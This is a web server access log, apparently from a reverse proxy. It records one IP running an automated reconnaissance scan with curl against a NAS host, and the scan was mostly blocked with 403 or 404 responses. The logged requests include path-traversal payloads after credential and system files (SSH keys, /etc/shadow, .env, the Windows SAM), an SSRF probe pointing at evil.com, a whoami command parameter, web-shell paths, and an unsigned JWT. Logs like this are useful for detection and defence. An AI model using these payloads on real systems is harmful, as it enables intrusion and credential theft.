"/bluepay/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 404 404 - GET https nas.profibot.hu "/snapshot/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 404 404 - GET https nas.profibot.hu "/axis2/services/listServices" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 403 403 - GET https nas.profibot.hu "/.well-known/security.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 404 404 - GET https nas.profibot.hu "/static/css/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 404 404 - GET https nas.profibot.hu "/etc/sysconfig/mail" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 404 404 - GET https nas.profibot.hu "/signing/gnupg/keyring.gpg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 404 404 - GET https nas.profibot.hu "/api/docs" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 404 404 - GET https nas.profibot.hu "/v1/messages?user_id=2&auth_token=deadbeef" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 404 404 - GET https nas.profibot.hu "/spatial/audio_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 404 404 - GET https nas.profibot.hu "/debug.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 404 404 - GET https nas.profibot.hu "/sca/config.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 404 404 - GET https nas.profibot.hu "/xkeysib.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 404 404 - GET https nas.profibot.hu "/payload/loader.sh" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 404 404 - GET https nas.profibot.hu "/admincp/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/zimbra/jetty/etc/jetty.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/etc/haproxy/haproxy.cfg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/grafana" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/etc/passwd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 403 403 - GET https nas.profibot.hu "/..%5c..%5c..%5c..%5c..%5c..%5cetc/shadow" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/bootstrap/cache/services.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/telemedicine/system.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/signin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/console" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/manifests/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/user/permissions" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/fundraising/project_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/ca/intermediate.crt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/b374k.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/commerce-layer/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/api/v1/admin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/nanotech/sensor_settings.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/includes/conf.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:06 +0000] - 404 404 - GET https nas.profibot.hu "/packages/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/composer.lock" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/public/stripe.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/php.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/vital/signals/stream_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 403 403 - GET https nas.profibot.hu "/..%255c..%255c..%255c..%255c..%255c..%255cwindows/system32/config/SAM" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/version1/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/tor/torrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/puppet/manifests/site.pp" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/usr/lib/courier/etc/esmtpd-ssl" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - - 403 - GET https nas.profibot.hu "/api/callback?url=http://evil.com" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/pii/scrubber.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/hmd/optics_config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/admin/store-config.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/admin/import-url" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/qa/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - - 403 - GET https nas.profibot.hu "/?uri=http://localhost" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/application/configs/application.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/_docs/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/canarytokens/token.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:07 +0000] - 404 404 - GET https nas.profibot.hu "/dashboard-admin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - 404 404 - GET https nas.profibot.hu "/admin/cmd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - 200 200 - GET https nas.profibot.hu "/robots.txt" [Client 185.177.72.49] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - 404 404 - GET https nas.profibot.hu "/config/test.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - 404 404 - GET https nas.profibot.hu "/beats/metricbeat.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - 404 404 - GET https nas.profibot.hu "/remix.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - 404 404 - GET https nas.profibot.hu "/login?access_token=a.b.c" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - 404 404 - GET https nas.profibot.hu "/invoices/setup.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - - 403 - GET https nas.profibot.hu "/?callback=http://" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - - 403 - GET https nas.profibot.hu "/?api=http://" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - 404 404 - GET https nas.profibot.hu "/admin/dologin.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - 404 404 - GET https nas.profibot.hu "/android/app/build.gradle" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - 404 404 - GET https nas.profibot.hu "/payment/upi/config.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - 404 404 - GET https nas.profibot.hu "/payroll/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - 404 404 - GET https nas.profibot.hu "/admin/index.html" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - 404 404 - GET https nas.profibot.hu "/api/load?script=whoami" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - 404 404 - GET https nas.profibot.hu "/test/config.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:08 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/rancher/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/content/robots.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/readiness" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/admin/settings.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/etc/passwd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/CHANGELOG.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/backend/backend" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/xkeysib.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/firewall.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/cf-cache-status" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/tracking/settings.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/env.bak" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/usr/local/nginx/conf/nginx.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/orbital/params.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/payu/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/api/users/1/settings" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/fundraiser/match_policy.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/jwt/verify?token=eyJhbGciOiJub25lIn0..." [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:09 +0000] - 404 404 - GET https nas.profibot.hu "/affirm/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/android/app/google-services.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/shell.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/proc/self/environ" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/geth.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/brainwave/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/identity/walletconnect.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/saml/metadata.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/debit/limits.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/model/training_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/broker/topics.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/etc/default/exim4" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/src/config/cryptomus.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/platformio.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/sendgrid.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/mailjet/credentials.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 403 403 - GET https nas.profibot.hu "/.zsh_aliases" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - 404 404 - GET https nas.profibot.hu "/admin/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:10 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/admin/execute" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 403 403 - GET https nas.profibot.hu "/.idea/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/giropay/config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/ros/config/params.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/panel/configuration.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/admin/auth/login" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/marketplace/config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - - 403 